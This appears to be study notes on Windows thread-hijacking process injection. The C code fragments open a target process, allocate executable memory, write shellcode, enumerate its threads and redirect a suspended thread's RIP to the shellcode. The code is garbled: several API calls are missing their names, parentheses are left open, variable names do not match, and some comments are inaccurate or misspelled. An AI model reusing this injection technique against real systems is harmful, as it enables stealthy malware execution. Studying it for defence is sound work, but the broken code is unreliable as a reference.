80 lines
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80 lines
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# Thread Hijacking
* Open process, allocate and write memory
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, // Requests all possible access rights
FALSE, // Child processes do not inheret parent process handle
processId // Stored process ID
PVOIF remoteBuffer = VirtualAllocEx(
hProcess, // Opened target process
sizeof shellcode, // Region size of memory allocation
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
processHandle, // Opened target process
remoteBuffer, // Allocated memory region
shellcode, // Data to write
sizeof shellcode, // byte size of data
* Snapshot the process and get the first thread
THREADENTRY32 threadEntry;
HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
TH32CS_SNAPTHREAD, // Include all processes residing on the system
0 // Indicates the current process
Thread32First( // Obtains the first thread in the snapshot
hSnapshot, // Handle of the snapshot
&threadEntry // Pointer to the THREADENTRY32 structure
while (Thread32Next( // Obtains the next thread in the snapshot
snapshot, // Handle of the snapshot
&threadEntry // Pointer to the THREADENTRY32 structure
)) {
* Get Pointer to the thread
if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
HANDLE hThread = OpenThread(
THREAD_ALL_ACCESS, // Requests all possible access rights
FALSE, // Child threads do not inheret parent thread handle
threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
* Suspend threat ,get context and change `$rip`
CONTEXT context;
hThread, // Handle for the thread
&context // Pointer to store the context structure
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
* Set context and resume the thread
hThread, // Handle for the thread
&context // Pointer to the context structure
hThread // Handle for the thread